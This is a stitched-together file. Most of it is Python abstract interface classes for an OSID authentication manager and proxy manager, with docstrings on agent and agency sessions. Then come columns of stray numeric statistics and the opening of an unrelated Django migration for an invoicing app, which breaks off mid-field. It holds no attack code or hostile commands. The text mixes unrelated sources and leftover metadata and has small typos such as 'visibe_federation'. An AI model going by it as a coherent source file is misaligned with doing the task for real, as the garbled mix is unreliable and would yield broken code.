:raise: ``Unimplemented`` -- ``supports_agent_lookup()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_lookup()`` and
``supports_visible_federation()`` are ``true``.*
"""
return # osid.authentication.AgentLookupSession
@abc.abstractmethod
def get_agent_query_session(self):
"""Gets the ``OsidSession`` associated with the agent query service.
:return: an ``AgentQuerySession``
:rtype: ``osid.authentication.AgentQuerySession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_query()`` is ``true``.*
"""
return # osid.authentication.AgentQuerySession
agent_query_session = property(fget=get_agent_query_session)
@abc.abstractmethod
def get_agent_query_session_for_agency(self, agency_id):
"""Gets the ``OsidSession`` associated with the agent query service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:return: ``an _agent_query_session``
:rtype: ``osid.authentication.AgentQuerySession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_query()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_query()`` and ``supports_visible_federation()``
are ``true``.*
"""
return # osid.authentication.AgentQuerySession
@abc.abstractmethod
def get_agent_search_session(self):
"""Gets the ``OsidSession`` associated with the agent search service.
:return: an ``AgentSearchSession``
:rtype: ``osid.authentication.AgentSearchSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_search()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_search()`` is ``true``.*
"""
return # osid.authentication.AgentSearchSession
agent_search_session = property(fget=get_agent_search_session)
@abc.abstractmethod
def get_agent_search_session_for_agency(self, agency_id):
"""Gets the ``OsidSession`` associated with the agent search service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:return: ``an _agent_search_session``
:rtype: ``osid.authentication.AgentSearchSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_search()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_search()`` and
``supports_visible_federation()`` are ``true``.*
"""
return # osid.authentication.AgentSearchSession
@abc.abstractmethod
def get_agent_admin_session(self):
"""Gets the ``OsidSession`` associated with the agent administration service.
:return: an ``AgentAdminSession``
:rtype: ``osid.authentication.AgentAdminSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_admin()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_admin()`` is ``true``.*
"""
return # osid.authentication.AgentAdminSession
agent_admin_session = property(fget=get_agent_admin_session)
@abc.abstractmethod
def get_agent_admin_session_for_agency(self, agency_id):
"""Gets the ``OsidSession`` associated with the agent admin service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:return: ``an _agent_admin_session``
:rtype: ``osid.authentication.AgentAdminSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_admin()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_admin()`` and ``supports_visible_federation()``
are ``true``.*
"""
return # osid.authentication.AgentAdminSession
@abc.abstractmethod
def get_agent_notification_session(self, agent_receiver):
"""Gets the notification session for notifications pertaining to service changes.
:param agent_receiver: the agent receiver
:type agent_receiver: ``osid.authentication.AgentReceiver``
:return: an ``AgentNotificationSession``
:rtype: ``osid.authentication.AgentNotificationSession``
:raise: ``NullArgument`` -- ``agent_receiver`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_notification()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_notification()`` is ``true``.*
"""
return # osid.authentication.AgentNotificationSession
@abc.abstractmethod
def get_agent_notification_session_for_agency(self, agent_receiver, agency_id):
"""Gets the ``OsidSession`` associated with the agent notification service for the given agency.
:param agent_receiver: the agent receiver
:type agent_receiver: ``osid.authentication.AgentReceiver``
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:return: ``an _agent_notification_session``
:rtype: ``osid.authentication.AgentNotificationSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agent_receiver`` or ``agency_id`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_notification()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_notification()`` and
``supports_visible_federation()`` are ``true``.*
"""
return # osid.authentication.AgentNotificationSession
@abc.abstractmethod
def get_agent_agency_session(self):
"""Gets the session for retrieving agent to agency mappings.
:return: an ``AgentAgencySession``
:rtype: ``osid.authentication.AgentAgencySession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_agency()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_agency()`` is ``true``.*
"""
return # osid.authentication.AgentAgencySession
agent_agency_session = property(fget=get_agent_agency_session)
@abc.abstractmethod
def get_agent_agency_assignment_session(self):
"""Gets the session for assigning agent to agency mappings.
:return: a ``AgentAgencyAsignmentSession``
:rtype: ``osid.authentication.AgentAgencyAssignmentSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_agency_assignment()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_agency_assignment()`` is ``true``.*
"""
return # osid.authentication.AgentAgencyAssignmentSession
agent_agency_assignment_session = property(fget=get_agent_agency_assignment_session)
@abc.abstractmethod
def get_agent_smart_agency_session(self, agency_id):
"""Gets the ``OsidSession`` associated with the agent smart agency service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:return: an ``AgentSmartAgencySession``
:rtype: ``osid.authentication.AgentSmartAgencySession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_smart_agency()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_smart_agency()`` and
``supports_visibe_federation()`` is ``true``.*
"""
return # osid.authentication.AgentSmartAgencySession
@abc.abstractmethod
def get_agency_lookup_session(self):
"""Gets the ``OsidSession`` associated with the agency lookup service.
:return: an ``AgencyLookupSession``
:rtype: ``osid.authentication.AgencyLookupSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_lookup()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_lookup()`` is ``true``.*
"""
return # osid.authentication.AgencyLookupSession
agency_lookup_session = property(fget=get_agency_lookup_session)
@abc.abstractmethod
def get_agency_search_session(self):
"""Gets the ``OsidSession`` associated with the agency search service.
:return: an ``AgencySearchSession``
:rtype: ``osid.authentication.AgencySearchSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_search()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_search()`` is ``true``.*
"""
return # osid.authentication.AgencySearchSession
agency_search_session = property(fget=get_agency_search_session)
@abc.abstractmethod
def get_agency_admin_session(self):
"""Gets the ``OsidSession`` associated with the agency administration service.
:return: an ``AgencyAdminSession``
:rtype: ``osid.authentication.AgencyAdminSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_admin()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_admin()`` is ``true``.*
"""
return # osid.authentication.AgencyAdminSession
agency_admin_session = property(fget=get_agency_admin_session)
@abc.abstractmethod
def get_agency_notification_session(self, agency_receiver):
"""Gets the notification session for notifications pertaining to agency service changes.
:param agency_receiver: the agency receiver
:type agency_receiver: ``osid.authentication.AgencyReceiver``
:return: an ``AgencyNotificationSession``
:rtype: ``osid.authentication.AgencyNotificationSession``
:raise: ``NullArgument`` -- ``agency_receiver`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_notification()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_notification()`` is ``true``.*
"""
return # osid.authentication.AgencyNotificationSession
@abc.abstractmethod
def get_agency_hierarchy_session(self):
"""Gets the session traversing agency hierarchies.
:return: an ``AgencyHierarchySession``
:rtype: ``osid.authentication.AgencyHierarchySession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_hierarchy()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_hierarchy()`` is ``true``.*
"""
return # osid.authentication.AgencyHierarchySession
agency_hierarchy_session = property(fget=get_agency_hierarchy_session)
@abc.abstractmethod
def get_agency_hierarchy_design_session(self):
"""Gets the session designing agency hierarchies.
:return: an ``AgencyHierarchyDesignSession``
:rtype: ``osid.authentication.AgencyHierarchyDesignSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_hierarchy_design()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_hierarchy_design()`` is ``true``.*
"""
return # osid.authentication.AgencyHierarchyDesignSession
agency_hierarchy_design_session = property(fget=get_agency_hierarchy_design_session)
@abc.abstractmethod
def get_authentication_batch_manager(self):
"""Gets an ``AuthenticationBatchManager``.
:return: an ``AuthenticationBatchManager``.
:rtype: ``osid.authentication.batch.AuthenticationBatchManager``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_authentication_batch()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_authentication_batch()`` is ``true``.*
"""
return # osid.authentication.batch.AuthenticationBatchManager
authentication_batch_manager = property(fget=get_authentication_batch_manager)
@abc.abstractmethod
def get_authentication_keys_manager(self):
"""Gets an ``AuthenticationKeysManager``.
:return: an ``AuthenticationKeysManager``.
:rtype: ``osid.authentication.keys.AuthenticationKeysManager``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_authentication_keys()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_authentication_keys()`` is ``true``.*
"""
return # osid.authentication.keys.AuthenticationKeysManager
authentication_keys_manager = property(fget=get_authentication_keys_manager)
@abc.abstractmethod
def get_authentication_process_manager(self):
"""Gets an ``AuthenticationProcessManager``.
:return: an ``AuthenticationProcessManager``.
:rtype: ``osid.authentication.process.AuthenticationProcessManager``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_authentication_process()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_authentication_process()`` is ``true``.*
"""
return # osid.authentication.process.AuthenticationProcessManager
authentication_process_manager = property(fget=get_authentication_process_manager)
class AuthenticationProxyManager:
"""The authentication proxy manager provides access to authentication sessions and provides interoperability tests for various aspects of this service.
Methods in this manager support the passing of a ``Proxy`` object.
The sessions included in this manager are:
* ``AgentLookupSession:`` session to look up ``Agents``
* ``AgentQuerySession`` : a session to query ``Agents``
* ``AgentSearchSession:`` session to search ``Agents``
* ``AgentAdminSession:`` session to create, modify and delete
``Agents``
* Agent ``NotificationSession:`` session to receive messages
pertaining to ``Agent`` changes
* ``AgentAgencySession:`` a session to retrieve ``Agent`` to
``Agency`` mappings
* ``AgentAgencyAssignmentSession:`` a session to manage ``Agent``
to ``Agency`` mappings
* ``AgentSmartAgencySession:`` a session to create dynamic
agencies
* ``AgencyLookupSession:`` a session to lookup agencies
* ``AgencyQuerySession:`` a session to query agencies
* ``AgencySearchSession`` : a session to search agencies
* ``AgencyAdminSession`` : a session to create, modify and delete
agencies
* ``AgencyNotificationSession`` : a session to receive messages
pertaining to ``Agency`` changes
* ``AgencyHierarchySession`` : a session to traverse the
``Agency`` hierarchy
* ``AgencyHierarchyDesignSession`` : a session to manage the
``Agency`` hierarchy
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_agent_lookup_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agent lookup service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentLookupSession``
:rtype: ``osid.authentication.AgentLookupSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_lookup()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_lookup()`` is ``true``.*
"""
return # osid.authentication.AgentLookupSession
@abc.abstractmethod
def get_agent_lookup_session_for_agency(self, agency_id, proxy):
"""Gets the ``OsidSession`` associated with the agent lookup service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: ``an _agent_lookup_session``
:rtype: ``osid.authentication.AgentLookupSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_lookup()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_lookup()`` and
``supports_visible_federation()`` are ``true``.*
"""
return # osid.authentication.AgentLookupSession
@abc.abstractmethod
def get_agent_query_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agent query service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentQuerySession``
:rtype: ``osid.authentication.AgentQuerySession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_query()`` is ``true``.*
"""
return # osid.authentication.AgentQuerySession
@abc.abstractmethod
def get_agent_query_session_for_agency(self, agency_id, proxy):
"""Gets the ``OsidSession`` associated with the agent query service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentQuerySession``
:rtype: ``osid.authentication.AgentQuerySession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_query()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_query()`` and ``supports_visible_federation()``
are ``true``.*
"""
return # osid.authentication.AgentQuerySession
@abc.abstractmethod
def get_agent_search_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agent search service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentSearchSession``
:rtype: ``osid.authentication.AgentSearchSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_search()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_search()`` is ``true``.*
"""
return # osid.authentication.AgentSearchSession
@abc.abstractmethod
def get_agent_search_session_for_agency(self, agency_id, proxy):
"""Gets the ``OsidSession`` associated with the agent search service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: ``an _agent_search_session``
:rtype: ``osid.authentication.AgentSearchSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_search()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_search()`` and
``supports_visible_federation()`` are ``true``.*
"""
return # osid.authentication.AgentSearchSession
@abc.abstractmethod
def get_agent_admin_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agent administration service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentAdminSession``
:rtype: ``osid.authentication.AgentAdminSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_admin()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_admin()`` is ``true``.*
"""
return # osid.authentication.AgentAdminSession
@abc.abstractmethod
def get_agent_admin_session_for_agency(self, agency_id, proxy):
"""Gets the ``OsidSession`` associated with the agent admin service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: ``an _agent_admin_session``
:rtype: ``osid.authentication.AgentAdminSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_admin()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_admin()`` and ``supports_visible_federation()``
are ``true``.*
"""
return # osid.authentication.AgentAdminSession
@abc.abstractmethod
def get_agent_notification_session(self, agent_receiver, proxy):
"""Gets the messaging receiver session for notifications pertaining to agent changes.
:param agent_receiver: the agent receiver
:type agent_receiver: ``osid.authentication.AgentReceiver``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentNotificationSession``
:rtype: ``osid.authentication.AgentNotificationSession``
:raise: ``NullArgument`` -- ``proxy`` or ``agent_receiver`` is null
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_notification()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_notification()`` is ``true``.*
"""
return # osid.authentication.AgentNotificationSession
@abc.abstractmethod
def get_agent_notification_session_for_agency(self, agent_receiver, agency_id, proxy):
"""Gets the ``OsidSession`` associated with the agent notification service for the given agency.
:param agent_receiver: the agent receiver
:type agent_receiver: ``osid.authentication.AgentReceiver``
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: ``an _agent_notification_session``
:rtype: ``osid.authentication.AgentNotificationSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agent_receiver, agency_id`` or ``proxy`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_notification()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_notification()`` and
``supports_visible_federation()`` are ``true``.*
"""
return # osid.authentication.AgentNotificationSession
@abc.abstractmethod
def get_agent_agency_session(self, proxy):
"""Gets the session for retrieving agent to agency mappings.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentAgencySession``
:rtype: ``osid.authentication.AgentAgencySession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_agency()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_agency()`` is ``true``.*
"""
return # osid.authentication.AgentAgencySession
@abc.abstractmethod
def get_agent_agency_assignment_session(self, proxy):
"""Gets the session for assigning agent to agency mappings.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentAgencyAssignmentSession``
:rtype: ``osid.authentication.AgentAgencyAssignmentSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_agency_assignment()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_agency_assignment()`` is ``true``.*
"""
return # osid.authentication.AgentAgencyAssignmentSession
@abc.abstractmethod
def get_agent_smart_agency_session(self, agency_id, proxy):
"""Gets the ``OsidSession`` associated with the agent smart agency service for the given agency.
:param agency_id: the ``Id`` of the bank
:type agency_id: ``osid.id.Id``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentSmartAgencySession``
:rtype: ``osid.authentication.AgentSmartAgencySession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_smart_agency()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_smart_agency()`` and
``supports_visibe_federation()`` is ``true``.*
"""
return # osid.authentication.AgentSmartAgencySession
@abc.abstractmethod
def get_agency_lookup_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agency lookup service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgencyLookupSession``
:rtype: ``osid.authentication.AgencyLookupSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_lookup()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_lookup()`` is ``true``.*
"""
return # osid.authentication.AgencyLookupSession
@abc.abstractmethod
def get_agency_search_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agency search service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgencySearchSession``
:rtype: ``osid.authentication.AgencySearchSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_search()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_search()`` is ``true``.*
"""
return # osid.authentication.AgencySearchSession
@abc.abstractmethod
def get_agency_admin_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agency administration service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgencyAdminSession``
:rtype: ``osid.authentication.AgencyAdminSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_admin()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_admin()`` is ``true``.*
"""
return # osid.authentication.AgencyAdminSession
@abc.abstractmethod
def get_agency_notification_session(self, agency_receiver, proxy):
"""Gets the messaging receiver session for notifications pertaining to agency changes.
:param agency_receiver: the agency receiver
:type agency_receiver: ``osid.authentication.AgencyReceiver``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgencyNotificationSession``
:rtype: ``osid.authentication.AgencyNotificationSession``
:raise: ``NullArgument`` -- ``agency_receiver`` or ``proxy`` is null
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_notification()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_notification()`` is ``true``.*
"""
return # osid.authentication.AgencyNotificationSession
@abc.abstractmethod
def get_agency_hierarchy_session(self, proxy):
"""Gets the session traversing agency hierarchies.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgencyHierarchySession``
:rtype: ``osid.authentication.AgencyHierarchySession``
:raise: ``NullArgument`` -- ``proxy`` is null
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_hierarchy()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_hierarchy()`` is ``true``.*
"""
return # osid.authentication.AgencyHierarchySession
@abc.abstractmethod
def get_agency_hierarchy_design_session(self, proxy):
"""Gets the session designing agency hierarchies.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgencyHierarchyDesignSession``
:rtype: ``osid.authentication.AgencyHierarchyDesignSession``
:raise: ``NullArgument`` -- ``proxy`` is null
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agency_hierarchy_design()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agency_hierarchy_design()`` is ``true``.*
"""
return # osid.authentication.AgencyHierarchyDesignSession
@abc.abstractmethod
def get_authentication_batch_proxy_manager(self):
"""Gets an ``AuthenticationBatchProxyManager``.
:return: an ``AuthenticationBatchProxyManager``.
:rtype: ``osid.authentication.batch.AuthenticationBatchProxyManager``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_authentication_batch()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_authentication_batch()`` is ``true``.*
"""
return # osid.authentication.batch.AuthenticationBatchProxyManager
authentication_batch_proxy_manager = property(fget=get_authentication_batch_proxy_manager)
@abc.abstractmethod
def get_authentication_keys_proxy_manager(self):
"""Gets an ``AuthenticationKeysProxyManager``.
:return: an ``AuthenticationKeysProxyManager``.
:rtype: ``osid.authentication.keys.AuthenticationKeysProxyManager``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_authentication_keys()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_authentication_keys()`` is ``true``.*
"""
return # osid.authentication.keys.AuthenticationKeysProxyManager
authentication_keys_proxy_manager = property(fget=get_authentication_keys_proxy_manager)
@abc.abstractmethod
def get_authentication_process_proxy_manager(self):
"""Gets an ``AuthenticationProcessProxyManager``.
:return: an ``AuthenticationProcessproxyManager``.
:rtype: ``osid.authentication.process.AuthenticationProcessProxyManager``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_authentication_process()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_authentication_process()`` is ``true``.*
"""
return # osid.authentication.process.AuthenticationProcessProxyManager
authentication_process_proxy_manager = property(fget=get_authentication_process_proxy_manager)
| 38.76682
| 155
| 0.652356
| 5,068
| 50,707
| 6.379045
| 0.044396
| 0.052337
| 0.044542
| 0.035634
| 0.913483
| 0.884345
| 0.846485
| 0.805314
| 0.749049
| 0.709085
| 0
| 0
| 0.225965
| 50,707
| 1,307
| 156
| 38.79648
| 0.82369
| 0.712485
| 0
| 0.602459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.295082
| false
| 0
| 0.004098
| 0
| 0.704918
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
a9ceeb0d7e8e401304436cf9e199d1c7a430045b
| 14,617
|
py
|
Python
|
codenerix_invoicing/migrations/0002_auto_20180129_0937.py
|
centrologic/codenerix_invoicing
|
eb249c3a38d0e2e2fa9accf9a93f40418b906eda
|
[
"Apache-2.0"
] | null | null | null |
codenerix_invoicing/migrations/0002_auto_20180129_0937.py
|
centrologic/codenerix_invoicing
|
eb249c3a38d0e2e2fa9accf9a93f40418b906eda
|
[
"Apache-2.0"
] | null | null | null |
codenerix_invoicing/migrations/0002_auto_20180129_0937.py
|
centrologic/codenerix_invoicing
|
eb249c3a38d0e2e2fa9accf9a93f40418b906eda
|
[
"Apache-2.0"
] | 1
|
2018-05-22T10:00:23.000Z
|
2018-05-22T10:00:23.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-01-29 08:37
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('codenerix_payments', '0001_initial'),
('codenerix_invoicing', '0001_initial'),
('codenerix_products', '0008_auto_20180126_1711'),
('codenerix_pos', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='salesbasket',
name='pos',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='basket_sales', to='codenerix_pos.POS', verbose_name='Point of Sales'),
),
migrations.AddField(
model_name='salesbasket',
name='pos_slot',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='basket_sales', to='codenerix_pos.POSSlot', verbose_name='POS Slot'),
),
migrations.AddField(
model_name='purchasesticketrectificationdocument',
name='ticket_rectification',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ticketrectificationdocument_purchases', to='codenerix_invoicing.PurchasesTicketRectification', verbose_name='Ticket rectification'),
),
migrations.AddField(
model_name='purchasesticketdocument',
name='ticket',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ticketdocument_purchases', to='codenerix_invoicing.PurchasesTicket', verbose_name='Ticket'),
),
migrations.AddField(
model_name='purchasesticket',
name='provider',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ticket_purchases', to='codenerix_invoicing.Provider', verbose_name='Provider'),
),
migrations.AddField(
model_name='purchasesorderdocument',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='orderdocument_purchases', to='codenerix_invoicing.PurchasesOrder', verbose_name='Purchases order'),
),
migrations.AddField(
model_name='purchasesorder',
name='budget',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='order_purchases', to='codenerix_invoicing.PurchasesBudget', verbose_name='Budget'),
),
migrations.AddField(
model_name='purchasesorder',
name='provider',
